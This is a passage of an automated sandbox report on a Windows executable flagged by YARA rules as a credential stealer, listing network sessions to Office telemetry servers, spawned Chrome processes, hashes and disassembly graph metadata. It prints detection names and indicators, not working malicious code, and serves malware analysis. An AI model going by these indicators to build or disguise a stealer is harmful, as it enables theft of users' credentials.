                                                                                                                                                                                                            2024-11-21 14:18:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            146192.168.2.64991213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:05 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                            x-ms-request-id: de6f427f-801e-00ac-4ba5-3bfd65000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141805Z-r1d97b99577d6qrbhC1TEBux5s0000000aeg00000000p4ar
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            147192.168.2.64992113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:07 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                            x-ms-request-id: 8945419b-e01e-0003-217d-3b0fa8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141807Z-178bfbc474bw8bwphC1NYC38b400000001bg00000000m9e7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            148192.168.2.64991913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:07 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                            x-ms-request-id: 5c785bae-401e-0083-638c-3a075c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141807Z-178bfbc474bkvpdnhC1NYCuu2w00000001r0000000006409
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            149192.168.2.64992013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:18:07 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                            x-ms-request-id: 739b7327-201e-003f-38a1-3b6d94000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141807Z-r1d97b99577xdmfxhC1TEBqbhg000000020g00000000gekn
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:18:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:09:17:06
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                            Imagebase:0x190000
                                                                                                                                                                                                            File size:1'849'856 bytes
                                                                                                                                                                                                            MD5 hash:44C888B5629AF6E043519152B1221C53
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:09:17:41
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:09:17:42
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2004,i,13335874620287231471,17284444125503527101,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:09:17:45
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:09:17:45
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1996,i,18408715541655219885,10244720130942789810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:0.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                              execution_graph 3656 61bef98 VirtualAlloc 3657 61befac 3656->3657 3657->3657 3658 61bee67 VirtualAlloc

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 61bee67-61bee9d VirtualAlloc
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000), ref: 061BEE72
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID: z@P
                                                                                                                                                                                                              • API String ID: 4275171209-3911971329
                                                                                                                                                                                                              • Opcode ID: ac2d9cba21e459ead9180e2dc1b16454e063323e1b7f4624920b056fb53569a7
                                                                                                                                                                                                              • Instruction ID: b48f2742e3e62e00ebd9ef63be416170a08ac8ab4eb989a2c52132694ad5a799
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2d9cba21e459ead9180e2dc1b16454e063323e1b7f4624920b056fb53569a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64E08CB4909614EFE7006F2588886BFFBE4EF28750F02492EEDC087200D2722C50CB93

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1 61bef98-61befa0 VirtualAlloc 2 61befac-61bf7ee 1->2 5 61bf7ef 2->5 5->5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000), ref: 061BEF9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: d2bd8510c075d2d28895da00c4d7f8b8761949e6545d7ea862598c20d25e33c9
                                                                                                                                                                                                              • Instruction ID: 8b2c9981fa68b25e0dc901c375191df49ef28841abdb09816234b5eaabedbaf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2bd8510c075d2d28895da00c4d7f8b8761949e6545d7ea862598c20d25e33c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1C0127400820E8FEB849F70880C3CE3A20EF52322F250B00F82281AC0C7B20C208BA9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 18 61d3564-61d389e 19 61d38b9-61d3d6e 18->19 20 61d38a4-61d38b4 18->20 20->19
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ?C5o$Zm_
                                                                                                                                                                                                              • API String ID: 0-3574690862
                                                                                                                                                                                                              • Opcode ID: c2953003cc81535d2a20967d75381d04204733220dfe2fc01dae1811ce5233a8
                                                                                                                                                                                                              • Instruction ID: 0406d0803cb0ff9f865900bf17e08dc6c363e318ef3b8d16fce58c5bdd34913f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2953003cc81535d2a20967d75381d04204733220dfe2fc01dae1811ce5233a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E00200F3E146254BF3485978DC98366B692EB94320F2F423C9F98A77C4ED7E5C098284

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 21 61f0b5c-61f0c39 22 61f0c3f-61f0c5f 21->22 23 61f0c64-61f1294 21->23 22->23
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2566693068.00000000061BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566572456.00000000061B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566601730.00000000061B2000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566631149.00000000061B6000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006448000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006456000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2566693068.0000000006458000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_61b0000_file.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4>"G$yS?w
                                                                                                                                                                                                              • API String ID: 0-2514480838
                                                                                                                                                                                                              • Opcode ID: df300a51301143af17712ba27ca6707d62b781f9191610f72dbe7af069b9ca98
                                                                                                                                                                                                              • Instruction ID: e6b34def49c87536783fa0f212caabf665a56f8a36c399c9c7a71225756fe52e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df300a51301143af17712ba27ca6707d62b781f9191610f72dbe7af069b9ca98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF1ADF3F156254BF3449979DC883A676839BD4320F2F82389B989B7C5ED7D9C064284

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 83 61d6810-61d691f 84 61d693e-61d6fd4 83->84 85 61d6925-61d6939 83->85 85->84
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
